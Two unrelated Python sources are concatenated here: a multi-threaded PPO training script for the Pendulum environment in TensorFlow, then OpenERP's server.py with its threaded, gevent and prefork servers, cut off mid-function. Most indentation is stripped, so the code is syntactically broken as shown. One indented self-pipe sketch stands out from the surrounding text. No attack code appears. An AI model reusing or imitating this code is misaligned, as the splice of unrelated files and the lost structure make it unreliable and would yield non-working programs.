Dependencies:
tensorflow r1.3
gym 0.9.2
"""
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import gym, threading, queue
EP_MAX = 1000
EP_LEN = 200
N_WORKER = 4 # parallel workers
GAMMA = 0.9 # reward discount factor
A_LR = 0.0001 # learning rate for actor
C_LR = 0.0002 # learning rate for critic
MIN_BATCH_SIZE = 64 # minimum batch size for updating PPO
UPDATE_STEP = 10 # loop update operation n-steps
EPSILON = 0.2 # for clipping surrogate objective
GAME = 'Pendulum-v0'
S_DIM, A_DIM = 3, 1 # state and action dimension
class PPO(object):
def __init__(self):
self.sess = tf.Session()
self.tfs = tf.placeholder(tf.float32, [None, S_DIM], 'state')
# critic
l1 = tf.layers.dense(self.tfs, 100, tf.nn.relu)
self.v = tf.layers.dense(l1, 1)
self.tfdc_r = tf.placeholder(tf.float32, [None, 1], 'discounted_r')
self.advantage = self.tfdc_r - self.v
self.closs = tf.reduce_mean(tf.square(self.advantage))
self.ctrain_op = tf.train.AdamOptimizer(C_LR).minimize(self.closs)
# actor
pi, pi_params = self._build_anet('pi', trainable=True)
oldpi, oldpi_params = self._build_anet('oldpi', trainable=False)
self.sample_op = tf.squeeze(pi.sample(1), axis=0) # operation of choosing action
self.update_oldpi_op = [oldp.assign(p) for p, oldp in zip(pi_params, oldpi_params)]
self.tfa = tf.placeholder(tf.float32, [None, A_DIM], 'action')
self.tfadv = tf.placeholder(tf.float32, [None, 1], 'advantage')
# ratio = tf.exp(pi.log_prob(self.tfa) - oldpi.log_prob(self.tfa))
ratio = pi.prob(self.tfa) / (oldpi.prob(self.tfa) + 1e-5)
surr = ratio * self.tfadv # surrogate loss
self.aloss = -tf.reduce_mean(tf.minimum( # clipped surrogate objective
surr,
tf.clip_by_value(ratio, 1. - EPSILON, 1. + EPSILON) * self.tfadv))
self.atrain_op = tf.train.AdamOptimizer(A_LR).minimize(self.aloss)
self.sess.run(tf.global_variables_initializer())
def update(self):
global GLOBAL_UPDATE_COUNTER
while not COORD.should_stop():
if GLOBAL_EP < EP_MAX:
UPDATE_EVENT.wait() # wait until get batch of data
self.sess.run(self.update_oldpi_op) # copy pi to old pi
data = [QUEUE.get() for _ in range(QUEUE.qsize())] # collect data from all workers
data = np.vstack(data)
s, a, r = data[:, :S_DIM], data[:, S_DIM: S_DIM + A_DIM], data[:, -1:]
adv = self.sess.run(self.advantage, {self.tfs: s, self.tfdc_r: r})
# update actor and critic in an update loop
[self.sess.run(self.atrain_op, {self.tfs: s, self.tfa: a, self.tfadv: adv}) for _ in range(UPDATE_STEP)]
[self.sess.run(self.ctrain_op, {self.tfs: s, self.tfdc_r: r}) for _ in range(UPDATE_STEP)]
UPDATE_EVENT.clear() # updating finished
GLOBAL_UPDATE_COUNTER = 0 # reset counter
ROLLING_EVENT.set() # set roll-out available
def _build_anet(self, name, trainable):
with tf.variable_scope(name):
l1 = tf.layers.dense(self.tfs, 200, tf.nn.relu, trainable=trainable)
mu = 2 * tf.layers.dense(l1, A_DIM, tf.nn.tanh, trainable=trainable)
sigma = tf.layers.dense(l1, A_DIM, tf.nn.softplus, trainable=trainable)
norm_dist = tf.distributions.Normal(loc=mu, scale=sigma)
params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=name)
return norm_dist, params
def choose_action(self, s):
s = s[np.newaxis, :]
a = self.sess.run(self.sample_op, {self.tfs: s})[0]
return np.clip(a, -2, 2)
def get_v(self, s):
if s.ndim < 2: s = s[np.newaxis, :]
return self.sess.run(self.v, {self.tfs: s})[0, 0]
class Worker(object):
def __init__(self, wid):
self.wid = wid
self.env = gym.make(GAME).unwrapped
self.ppo = GLOBAL_PPO
def work(self):
global GLOBAL_EP, GLOBAL_RUNNING_R, GLOBAL_UPDATE_COUNTER
while not COORD.should_stop():
s = self.env.reset()
ep_r = 0
buffer_s, buffer_a, buffer_r = [], [], []
for t in range(EP_LEN):
if not ROLLING_EVENT.is_set(): # while global PPO is updating
ROLLING_EVENT.wait() # wait until PPO is updated
buffer_s, buffer_a, buffer_r = [], [], [] # clear history buffer, use new policy to collect data
a = self.ppo.choose_action(s)
s_, r, done, _ = self.env.step(a)
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append((r + 8) / 8) # normalize reward, found to be useful
s = s_
ep_r += r
GLOBAL_UPDATE_COUNTER += 1 # count to minimum batch size, no need to wait other workers
if t == EP_LEN - 1 or GLOBAL_UPDATE_COUNTER >= MIN_BATCH_SIZE:
v_s_ = self.ppo.get_v(s_)
discounted_r = [] # compute discounted reward
for r in buffer_r[::-1]:
v_s_ = r + GAMMA * v_s_
discounted_r.append(v_s_)
discounted_r.reverse()
bs, ba, br = np.vstack(buffer_s), np.vstack(buffer_a), np.array(discounted_r)[:, np.newaxis]
buffer_s, buffer_a, buffer_r = [], [], []
QUEUE.put(np.hstack((bs, ba, br))) # put data in the queue
if GLOBAL_UPDATE_COUNTER >= MIN_BATCH_SIZE:
ROLLING_EVENT.clear() # stop collecting data
UPDATE_EVENT.set() # globalPPO update
if GLOBAL_EP >= EP_MAX: # stop training
COORD.request_stop()
break
# record reward changes, plot later
if len(GLOBAL_RUNNING_R) == 0: GLOBAL_RUNNING_R.append(ep_r)
else: GLOBAL_RUNNING_R.append(GLOBAL_RUNNING_R[-1]*0.9+ep_r*0.1)
GLOBAL_EP += 1
print('{0:.1f}%'.format(GLOBAL_EP/EP_MAX*100), '|W%i' % self.wid, '|Ep_r: %.2f' % ep_r,)
if __name__ == '__main__':
GLOBAL_PPO = PPO()
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
UPDATE_EVENT.clear() # not update now
ROLLING_EVENT.set() # start to roll out
workers = [Worker(wid=i) for i in range(N_WORKER)]
GLOBAL_UPDATE_COUNTER, GLOBAL_EP = 0, 0
GLOBAL_RUNNING_R = []
COORD = tf.train.Coordinator()
QUEUE = queue.Queue() # workers putting data in this queue
threads = []
for worker in workers: # worker threads
t = threading.Thread(target=worker.work, args=())
t.start() # training
threads.append(t)
# add a PPO updating thread
threads.append(threading.Thread(target=GLOBAL_PPO.update,))
threads[-1].start()
COORD.join(threads)
# plot reward change and test
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
plt.xlabel('Episode'); plt.ylabel('Moving reward'); plt.ion(); plt.show()
env = gym.make('Pendulum-v0')
while True:
s = env.reset()
for t in range(300):
env.render()
s = env.step(GLOBAL_PPO.choose_action(s))[0]
|
server.py
|
#-----------------------------------------------------------
# Threaded, Gevent and Prefork Servers
#-----------------------------------------------------------
import datetime
import errno
import logging
import os
import os.path
import platform
import psutil
import random
if os.name == 'posix':
import resource
else:
resource = None
import select
import signal
import socket
import subprocess
import sys
import threading
import time
import unittest2
import werkzeug.serving
try:
import fcntl
except ImportError:
pass
try:
from setproctitle import setproctitle
except ImportError:
setproctitle = lambda x: None
import openerp
from openerp.modules.registry import RegistryManager
from openerp.release import nt_service_name
import openerp.tools.config as config
from openerp.tools.misc import stripped_sys_argv, dumpstacks
_logger = logging.getLogger(__name__)
SLEEP_INTERVAL = 60 # 1 min
#----------------------------------------------------------
# Werkzeug WSGI servers patched
#----------------------------------------------------------
class LoggingBaseWSGIServerMixIn(object):
def handle_error(self, request, client_address):
t, e, _ = sys.exc_info()
if t == socket.error and e.errno == errno.EPIPE:
# broken pipe, ignore error
return
_logger.exception('Exception happened during processing of request from %s', client_address)
class BaseWSGIServerNoBind(LoggingBaseWSGIServerMixIn, werkzeug.serving.BaseWSGIServer):
""" werkzeug Base WSGI Server patched to skip socket binding. PreforkServer
use this class, sets the socket and calls the process_request() manually
"""
def __init__(self, app):
werkzeug.serving.BaseWSGIServer.__init__(self, "1", "1", app)
def server_bind(self):
# we don't bind because we use the listen socket of PreforkServer#socket
# instead we close the socket
if self.socket:
self.socket.close()
def server_activate(self):
# dont listen as we use PreforkServer#socket
pass
class RequestHandler(werkzeug.serving.WSGIRequestHandler):
def setup(self):
# flag the current thread as handling a http request
super(RequestHandler, self).setup()
me = threading.currentThread()
me.name = 'openerp.service.http.request.%s' % (me.ident,)
# _reexec() should set LISTEN_* to avoid connection refused during reload time. It
# should also work with systemd socket activation. This is currently untested
# and not yet used.
class ThreadedWSGIServerReloadable(LoggingBaseWSGIServerMixIn, werkzeug.serving.ThreadedWSGIServer):
""" werkzeug Threaded WSGI Server patched to allow reusing a listen socket
given by the environment; this is used by autoreload to keep the listen
socket open when a reload happens.
"""
def __init__(self, host, port, app):
super(ThreadedWSGIServerReloadable, self).__init__(host, port, app,
handler=RequestHandler)
def server_bind(self):
envfd = os.environ.get('LISTEN_FDS')
if envfd and os.environ.get('LISTEN_PID') == str(os.getpid()):
self.reload_socket = True
self.socket = socket.fromfd(int(envfd), socket.AF_INET, socket.SOCK_STREAM)
# should we os.close(int(envfd))? it seems python duplicates the fd.
else:
self.reload_socket = False
super(ThreadedWSGIServerReloadable, self).server_bind()
def server_activate(self):
if not self.reload_socket:
super(ThreadedWSGIServerReloadable, self).server_activate()
#----------------------------------------------------------
# AutoReload watcher
#----------------------------------------------------------
class AutoReload(object):
def __init__(self, server):
self.server = server
self.files = {}
self.modules = {}
import pyinotify
class EventHandler(pyinotify.ProcessEvent):
def __init__(self, autoreload):
self.autoreload = autoreload
def process_IN_CREATE(self, event):
_logger.debug('File created: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
def process_IN_MODIFY(self, event):
_logger.debug('File modified: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
self.wm = pyinotify.WatchManager()
self.handler = EventHandler(self)
self.notifier = pyinotify.Notifier(self.wm, self.handler, timeout=0)
mask = pyinotify.IN_MODIFY | pyinotify.IN_CREATE # IN_MOVED_FROM, IN_MOVED_TO ?
for path in openerp.modules.module.ad_paths:
_logger.info('Watching addons folder %s', path)
self.wm.add_watch(path, mask, rec=True)
def process_data(self, files):
xml_files = [i for i in files if i.endswith('.xml')]
for i in xml_files:
for path in openerp.modules.module.ad_paths:
if i.startswith(path):
# find out which addons path the file belongs to
# and extract its module name
right = i[len(path) + 1:].split('/')
if len(right) < 2:
continue
module = right[0]
self.modules[module] = 1
if self.modules:
_logger.info('autoreload: xml change detected, autoreload activated')
restart()
def process_python(self, files):
# process python changes
py_files = [i for i in files if i.endswith('.py')]
py_errors = []
# TODO keep python errors until they are ok
if py_files:
for i in py_files:
try:
source = open(i, 'rb').read() + '\n'
compile(source, i, 'exec')
except SyntaxError:
py_errors.append(i)
if py_errors:
_logger.info('autoreload: python code change detected, errors found')
for i in py_errors:
_logger.info('autoreload: SyntaxError %s', i)
else:
_logger.info('autoreload: python code updated, autoreload activated')
restart()
def check_thread(self):
# Check if some files have been touched in the addons path.
# If true, check if the touched file belongs to an installed module
# in any of the databases used in the registry manager.
while 1:
while self.notifier.check_events(1000):
self.notifier.read_events()
self.notifier.process_events()
l = self.files.keys()
self.files.clear()
self.process_data(l)
self.process_python(l)
def run(self):
t = threading.Thread(target=self.check_thread)
t.setDaemon(True)
t.start()
_logger.info('AutoReload watcher running')
#----------------------------------------------------------
# Servers: Threaded, Gevented and Prefork
#----------------------------------------------------------
class CommonServer(object):
def __init__(self, app):
# TODO Change the xmlrpc_* options to http_*
self.app = app
# config
self.interface = config['xmlrpc_interface'] or '0.0.0.0'
self.port = config['xmlrpc_port']
# runtime
self.pid = os.getpid()
def close_socket(self, sock):
""" Closes a socket instance cleanly
:param sock: the network socket to close
:type sock: socket.socket
"""
try:
sock.shutdown(socket.SHUT_RDWR)
except socket.error, e:
# On OSX, socket shutdowns both sides if any side closes it
# causing an error 57 'Socket is not connected' on shutdown
# of the other side (or something), see
# http://bugs.python.org/issue4397
# note: stdlib fixed test, not behavior
if e.errno != errno.ENOTCONN or platform.system() not in ['Darwin', 'Windows']:
raise
sock.close()
class ThreadedServer(CommonServer):
def __init__(self, app):
super(ThreadedServer, self).__init__(app)
self.main_thread_id = threading.currentThread().ident
# Variable keeping track of the number of calls to the signal handler defined
# below. This variable is monitored by ``quit_on_signals()``.
self.quit_signals_received = 0
#self.socket = None
self.httpd = None
def signal_handler(self, sig, frame):
if sig in [signal.SIGINT, signal.SIGTERM]:
# shutdown on kill -INT or -TERM
self.quit_signals_received += 1
if self.quit_signals_received > 1:
# logging.shutdown was already called at this point.
sys.stderr.write("Forced shutdown.\n")
os._exit(0)
elif sig == signal.SIGHUP:
# restart on kill -HUP
openerp.phoenix = True
self.quit_signals_received += 1
def cron_thread(self, number):
while True:
time.sleep(SLEEP_INTERVAL + number) # Steve Reich timing style
registries = openerp.modules.registry.RegistryManager.registries
_logger.debug('cron%d polling for jobs', number)
for db_name, registry in registries.items():
while True and registry.ready:
acquired = openerp.addons.base.ir.ir_cron.ir_cron._acquire_job(db_name)
if not acquired:
break
def cron_spawn(self):
""" Start the above runner function in a daemon thread.
The thread is a typical daemon thread: it will never quit and must be
terminated when the main process exits - with no consequence (the processing
threads it spawns are not marked daemon).
"""
# Force call to strptime just before starting the cron thread
# to prevent time.strptime AttributeError within the thread.
# See: http://bugs.python.org/issue7980
datetime.datetime.strptime('2012-01-01', '%Y-%m-%d')
for i in range(openerp.tools.config['max_cron_threads']):
def target():
self.cron_thread(i)
t = threading.Thread(target=target, name="openerp.service.cron.cron%d" % i)
t.setDaemon(True)
t.start()
_logger.debug("cron%d started!" % i)
def http_thread(self):
def app(e, s):
return self.app(e, s)
self.httpd = ThreadedWSGIServerReloadable(self.interface, self.port, app)
self.httpd.serve_forever()
def http_spawn(self):
t = threading.Thread(target=self.http_thread, name="openerp.service.httpd")
t.setDaemon(True)
t.start()
_logger.info('HTTP service (werkzeug) running on %s:%s', self.interface, self.port)
def start(self, stop=False):
_logger.debug("Setting signal handlers")
if os.name == 'posix':
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
elif os.name == 'nt':
import win32api
win32api.SetConsoleCtrlHandler(lambda sig: self.signal_handler(sig, None), 1)
test_mode = config['test_enable'] or config['test_file']
if not stop or test_mode:
# some tests need the http daemon to be available...
self.http_spawn()
if not stop:
# only relevant if we are not in "--stop-after-init" mode
self.cron_spawn()
def stop(self):
""" Shutdown the WSGI server. Wait for non deamon threads.
"""
_logger.info("Initiating shutdown")
_logger.info("Hit CTRL-C again or send a second signal to force the shutdown.")
if self.httpd:
self.httpd.shutdown()
self.close_socket(self.httpd.socket)
# Manually join() all threads before calling sys.exit() to allow a second signal
# to trigger _force_quit() in case some non-daemon threads won't exit cleanly.
# threading.Thread.join() should not mask signals (at least in python 2.5).
me = threading.currentThread()
_logger.debug('current thread: %r', me)
for thread in threading.enumerate():
_logger.debug('process %r (%r)', thread, thread.isDaemon())
if thread != me and not thread.isDaemon() and thread.ident != self.main_thread_id:
while thread.isAlive():
_logger.debug('join and sleep')
# Need a busyloop here as thread.join() masks signals
# and would prevent the forced shutdown.
thread.join(0.05)
time.sleep(0.05)
_logger.debug('--')
openerp.modules.registry.RegistryManager.delete_all()
logging.shutdown()
def run(self, preload=None, stop=False):
""" Start the http server and the cron thread then wait for a signal.
The first SIGINT or SIGTERM signal will initiate a graceful shutdown while
a second one if any will force an immediate exit.
"""
self.start(stop=stop)
rc = preload_registries(preload)
if stop:
self.stop()
return rc
# Wait for a first signal to be handled. (time.sleep will be interrupted
# by the signal handler.) The try/except is for the win32 case.
try:
while self.quit_signals_received == 0:
time.sleep(60)
except KeyboardInterrupt:
pass
self.stop()
def reload(self):
os.kill(self.pid, signal.SIGHUP)
class GeventServer(CommonServer):
def __init__(self, app):
super(GeventServer, self).__init__(app)
self.port = config['longpolling_port']
self.httpd = None
def watch_parent(self, beat=4):
import gevent
ppid = os.getppid()
while True:
if ppid != os.getppid():
pid = os.getpid()
_logger.info("LongPolling (%s) Parent changed", pid)
# suicide !!
os.kill(pid, signal.SIGTERM)
return
gevent.sleep(beat)
def start(self):
import gevent
from gevent.wsgi import WSGIServer
if os.name == 'posix':
signal.signal(signal.SIGQUIT, dumpstacks)
gevent.spawn(self.watch_parent)
self.httpd = WSGIServer((self.interface, self.port), self.app)
_logger.info('Evented Service (longpolling) running on %s:%s', self.interface, self.port)
self.httpd.serve_forever()
def stop(self):
import gevent
self.httpd.stop()
gevent.shutdown()
def run(self, preload, stop):
self.start()
self.stop()
class PreforkServer(CommonServer):
""" Multiprocessing inspired by (g)unicorn.
PreforkServer (aka Multicorn) currently uses accept(2) as the dispatching
method between workers, but we plan to replace it with a more intelligent
dispatcher that will parse the first HTTP request line.
"""
def __init__(self, app):
# config
self.address = (config['xmlrpc_interface'] or '0.0.0.0', config['xmlrpc_port'])
self.population = config['workers']
self.timeout = config['limit_time_real']
self.limit_request = config['limit_request']
# working vars
self.beat = 4
self.app = app
self.pid = os.getpid()
self.socket = None
self.workers_http = {}
self.workers_cron = {}
self.workers = {}
self.generation = 0
self.queue = []
self.long_polling_pid = None
def pipe_new(self):
pipe = os.pipe()
for fd in pipe:
# non_blocking
flags = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
# close_on_exec
flags = fcntl.fcntl(fd, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
return pipe
def pipe_ping(self, pipe):
try:
os.write(pipe[1], '.')
except IOError, e:
if e.errno not in [errno.EAGAIN, errno.EINTR]:
raise
def signal_handler(self, sig, frame):
if len(self.queue) < 5 or sig == signal.SIGCHLD:
self.queue.append(sig)
self.pipe_ping(self.pipe)
else:
_logger.warn("Dropping signal: %s", sig)
def worker_spawn(self, klass, workers_registry):
self.generation += 1
worker = klass(self)
pid = os.fork()
if pid != 0:
worker.pid = pid
self.workers[pid] = worker
workers_registry[pid] = worker
return worker
else:
worker.run()
sys.exit(0)
def long_polling_spawn(self):
nargs = stripped_sys_argv()
cmd = nargs[0]
cmd = os.path.join(os.path.dirname(cmd), "openerp-gevent")
nargs[0] = cmd
popen = subprocess.Popen([sys.executable] + nargs)
self.long_polling_pid = popen.pid
def worker_pop(self, pid):
if pid in self.workers:
_logger.debug("Worker (%s) unregistered", pid)
try:
self.workers_http.pop(pid, None)
self.workers_cron.pop(pid, None)
u = self.workers.pop(pid)
u.close()
except OSError:
return
def worker_kill(self, pid, sig):
try:
os.kill(pid, sig)
except OSError, e:
if e.errno == errno.ESRCH:
self.worker_pop(pid)
def process_signals(self):
while len(self.queue):
sig = self.queue.pop(0)
if sig in [signal.SIGINT, signal.SIGTERM]:
raise KeyboardInterrupt
elif sig == signal.SIGHUP:
# restart on kill -HUP
openerp.phoenix = True
raise KeyboardInterrupt
elif sig == signal.SIGQUIT:
# dump stacks on kill -3
self.dumpstacks()
elif sig == signal.SIGTTIN:
# increase number of workers
self.population += 1
elif sig == signal.SIGTTOU:
# decrease number of workers
self.population -= 1
def process_zombie(self):
# reap dead workers
while 1:
try:
wpid, status = os.waitpid(-1, os.WNOHANG)
if not wpid:
break
if (status >> 8) == 3:
msg = "Critial worker error (%s)"
_logger.critical(msg, wpid)
raise Exception(msg % wpid)
self.worker_pop(wpid)
except OSError, e:
if e.errno == errno.ECHILD:
break
raise
def process_timeout(self):
now = time.time()
for (pid, worker) in self.workers.items():
if worker.watchdog_timeout is not None and \
(now - worker.watchdog_time) >= worker.watchdog_timeout:
_logger.error("Worker (%s) timeout", pid)
self.worker_kill(pid, signal.SIGKILL)
def process_spawn(self):
while len(self.workers_http) < self.population:
self.worker_spawn(WorkerHTTP, self.workers_http)
while len(self.workers_cron) < config['max_cron_threads']:
self.worker_spawn(WorkerCron, self.workers_cron)
if not self.long_polling_pid:
self.long_polling_spawn()
def sleep(self):
try:
# map of fd -> worker
fds = dict([(w.watchdog_pipe[0], w) for k, w in self.workers.items()])
fd_in = fds.keys() + [self.pipe[0]]
# check for ping or internal wakeups
ready = select.select(fd_in, [], [], self.beat)
# update worker watchdogs
for fd in ready[0]:
if fd in fds:
fds[fd].watchdog_time = time.time()
try:
# empty pipe
while os.read(fd, 1):
pass
except OSError, e:
if e.errno not in [errno.EAGAIN]:
raise
except select.error, e:
if e[0] not in [errno.EINTR]:
raise
def start(self):
# wakeup pipe: Python doesn't raise EINTR when a syscall is interrupted
# by a signal (it simulates a pseudo SA_RESTART), so we write to a pipe in
# the signal handler to overcome this behaviour
self.pipe = self.pipe_new()
# set signal handlers
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGTTIN, self.signal_handler)
signal.signal(signal.SIGTTOU, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
# listen to socket
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.setblocking(0)
self.socket.bind(self.address)
self.socket.listen(8 * self.population)
def stop(self, graceful=True):
if self.long_polling_pid is not None:
# FIXME make longpolling process handle SIGTERM correctly
self.worker_kill(self.long_polling_pid, signal.SIGKILL)
self.long_polling_pid = None
if graceful:
_logger.info("Stopping gracefully")
limit = time.time() + self.timeout
for pid in self.workers.keys():
self.worker_kill(pid, signal.SIGTERM)
while self.workers and time.time() < limit:
self.process_zombie()
time.sleep(0.1)
else:
_logger.info("Stopping forcefully")
for pid in self.workers.keys():
self.worker_kill(pid, signal.SIGTERM)
self.socket.close()
def run(self, preload, stop):
self.start()
rc = preload_registries(preload)
if stop:
self.stop()
return rc
# Empty the cursor pool, we dont want them to be shared among forked workers.
openerp.sql_db.close_all()
_logger.debug("Multiprocess starting")
while 1:
try:
#_logger.debug("Multiprocess beat (%s)",time.time())
self.process_signals()
self.process_zombie()
self.process_timeout()
self.process_spawn()
self.sleep()
except KeyboardInterrupt:
_logger.debug("Multiprocess clean stop")
self.stop()
break
except Exception, e:
_logger.exception(e)
self.stop(False)
return -1
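# Standalone sketch of the self-pipe wakeup used by PreforkServer.start() and
# sleep() above (illustrative, not wired into the server): a signal handler
# writes one byte to a pipe that select() also watches, so the main loop wakes
# up promptly even though Python restarts interrupted syscalls. The real
# server additionally marks the pipe non-blocking and close-on-exec.
def _self_pipe_sketch():
    import os, select, signal
    r, w = os.pipe()
    def on_signal(sig, frame):
        os.write(w, b'.')  # cheap wakeup from the signal handler
    signal.signal(signal.SIGUSR1, on_signal)
    ready, _, _ = select.select([r], [], [], 4.0)
    if r in ready:
        os.read(r, 1)      # drain the wakeup byte
        return True        # a signal arrived during the wait
    return False           # plain timeout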
class Worker(object):
""" Workers """
def __init__(self, multi):
self.multi = multi
self.watchdog_time = time.time()
self.watchdog_pipe = multi.pipe_new()
# Can be set to None if no watchdog is desired.
self.watchdog_timeout = multi.timeout
self.ppid = os.getpid()
self.pid = None
self.alive = True
# should we rename into lifetime ?
self.request_max = multi.limit_request
self.request_count = 0
def setproctitle(self, title=""):
setproctitle('openerp: %s %s %s' % (self.__class__.__name__, self.pid, title))
def close(self):
os.close(self.watchdog_pipe[0])
os.close(self.watchdog_pipe[1])
def signal_handler(self, sig, frame):
self.alive = False
def sleep(self):
try:
select.select([self.multi.socket], [], [], self.multi.beat)
except select.error, e:
if e[0] not in [errno.EINTR]:
raise
def process_limit(self):
if resource is None:
return
# If our parent changed, commit suicide
if self.ppid != os.getppid():
_logger.info("Worker (%s) Parent changed", self.pid)
self.alive = False
# check for lifetime
if self.request_count >= self.request_max:
_logger.info("Worker (%d) max request (%s) reached.", self.pid, self.request_count)
self.alive = False
# Reset the worker if it consumes too much memory (e.g. caused by a memory leak).
rss, vms = psutil.Process(os.getpid()).get_memory_info()
if vms > config['limit_memory_soft']:
_logger.info('Worker (%d) virtual memory limit (%s) reached.', self.pid, vms)
self.alive = False # Commit suicide after the request.
# VMS and RLIMIT_AS are the same thing: virtual memory, a.k.a. address space
soft, hard = resource.getrlimit(resource.RLIMIT_AS)
resource.setrlimit(resource.RLIMIT_AS, (config['limit_memory_hard'], hard))
# SIGXCPU (exceeded CPU time) signal handler will raise an exception.
r = resource.getrusage(resource.RUSAGE_SELF)
cpu_time = r.ru_utime + r.ru_stime
def time_expired(n, stack):
_logger.info('Worker (%d) CPU time limit (%s) reached.', self.pid, config['limit_time_cpu'])
# We don't commit suicide in such a case
raise Exception('CPU time limit exceeded.')
signal.signal(signal.SIGXCPU, time_expired)
soft, hard = resource.getrlimit(resource.RLIMIT_CPU)
resource.setrlimit(resource.RLIMIT_CPU, (cpu_time + config['limit_time_cpu'], hard))
def process_work(self):
pass
def start(self):
self.pid = os.getpid()
self.setproctitle()
_logger.info("Worker %s (%s) alive", self.__class__.__name__, self.pid)
# Reseed the random number generator
random.seed()
# Prevent fd inheritance (close_on_exec)
flags = fcntl.fcntl(self.multi.socket, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(self.multi.socket, fcntl.F_SETFD, flags)
# reset blocking status
self.multi.socket.setblocking(0)
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
def stop(self):
pass
def run(self):
try:
self.start()
while self.alive:
self.process_limit()
self.multi.pipe_ping(self.watchdog_pipe)
self.sleep()
self.process_work()
_logger.info("Worker (%s) exiting. request_count: %s.", self.pid, self.request_count)
self.stop()
except Exception:
_logger.exception("Worker (%s) Exception occured, exiting..." % self.pid)
# should we use 3 to abort everything ?
sys.exit(1)
class WorkerHTTP(Worker):
""" HTTP Request workers """
def process_request(self, client, addr):
client.setblocking(1)
client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# Prevent fd inheritance (close_on_exec)
flags = fcntl.fcntl(client, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(client, fcntl.F_SETFD, flags)
# do request using BaseWSGIServerNoBind monkey patched with socket
self.server.socket = client
# tolerate broken pipe when the http client closes the socket before
# receiving the full reply
try:
self.server.process_request(client, addr)
except IOError, e:
if e.errno != errno.EPIPE:
raise
self.request_count += 1
def process_work(self):
try:
client, addr = self.multi.socket.accept()
self.process_request(client, addr)
except socket.error, e:
if e[0] not in (errno.EAGAIN, errno.ECONNABORTED):
raise
def start(self):
Worker.start(self)
self.server = BaseWSGIServerNoBind(self.multi.app)
class WorkerCron(Worker):
""" Cron workers """
def __init__(self, multi):
super(WorkerCron, self).__init__(multi)
# process_work() below process a single database per call.
# The variable db_index is keeping track of the next database to
# process.
self.db_index = 0
def sleep(self):
# Really sleep once all the databases have been processed.
if self.db_index == 0:
interval = SLEEP_INTERVAL + self.pid % 10 # chorus effect
time.sleep(interval)
def _db_list(self):
if config['db_name']:
db_names = config['db_name'].split(',')
else:
db_names = openerp.service.db.exp_list(True)
return db_names
def process_work(self):
rpc_request = logging.getLogger('openerp.netsvc.rpc.request')
rpc_request_flag = rpc_request.isEnabledFor(logging.DEBUG)
_logger.debug("WorkerCron (%s) polling for jobs", self.pid)
db_names = self._db_list()
if len(db_names):
self.db_index = (self.db_index + 1) % len(db_names)
db_name = db_names[self.db_index]
self.setproctitle(db_name)
if rpc_request_flag:
start_time = time.time()
start_rss, start_vms = psutil.Process(os.getpid()).get_memory_info()
import openerp.addons.base as base
base.ir.ir_cron.ir_cron._acquire_job(db_name)
openerp.modules.registry.RegistryManager.delete(db_name)
# dont keep cursors in multi database mode
if len(db_names) > 1:
openerp.sql_db.close_db(db_name)
if rpc_request_flag:
run_time = time.time() - start_time
end_rss, end_vms = psutil.Process(os.getpid()).get_memory_info()
vms_diff = (end_vms - start_vms) / 1024
logline = '%s time:%.3fs mem: %sk -> %sk (diff: %sk)' % \
(db_name, run_time, start_vms / 1024, end_vms / 1024, vms_diff)
_logger.debug("WorkerCron (%s) %s", self.pid, logline)
self.request_count += 1
if self.request_count >= self.request_max and self.request_max < len(db_names):
_logger.error("There are more dabatases to process than allowed "
"by the `limit_request` configuration variable: %s more.",
len(db_names) - self.request_max)
else:
self.db_index = 0
def start(self):
os.nice(10) # mommy always told me to be nice with others...
Worker.start(self)
self.multi.socket.close()
#----------------------------------------------------------
# start/stop public api
#----------------------------------------------------------
server = None
def load_server_wide_modules():
for m in openerp.conf.server_wide_modules:
try:
openerp.modules.module.load_openerp_module(m)
except Exception:
msg = ''
if m == 'web':
msg = """
The `web` module is provided by the addons found in the `openerp-web` project.
Maybe you forgot to add those addons in your addons_path configuration."""
_logger.exception('Failed to load server-wide module `%s`.%s', m, msg)
def _reexec(updated_modules=None):
"""reexecute openerp-server process with (nearly) the same arguments"""
if openerp.tools.osutil.is_running_as_nt_service():
subprocess.call('net stop {0} && net start {0}'.format(nt_service_name), shell=True)
exe = os.path.basename(sys.executable)
args = stripped_sys_argv()
args += ["-u", ','.join(updated_modules)]
if not args or args[0] != exe:
args.insert(0, exe)
os.execv(sys.executable, args)
def load_test_file_yml(registry, test_file):
with registry.cursor() as cr:
openerp.tools.convert_yaml_import(cr, 'base', file(test_file), 'test', {}, 'init')
if config['test_commit']:
_logger.info('test %s has been committed', test_file)
cr.commit()
else:
_logger.info('test %s has been rolled back', test_file)
cr.rollback()
def load_test_file_py(registry, test_file):
# Locate python module based on its filename and run the tests
test_path, _ = os.path.splitext(os.path.abspath(test_file))
for mod_name, mod_mod in sys.modules.items():
if mod_mod:
mod_path, _ = os.path.splitext(getattr(mod_mod, '__file__', ''))
if test_path == mod_path:
suite = unittest2.TestSuite()
for t in unittest2.TestLoader().loadTestsFromModule(mod_mod):
suite.addTest(t)
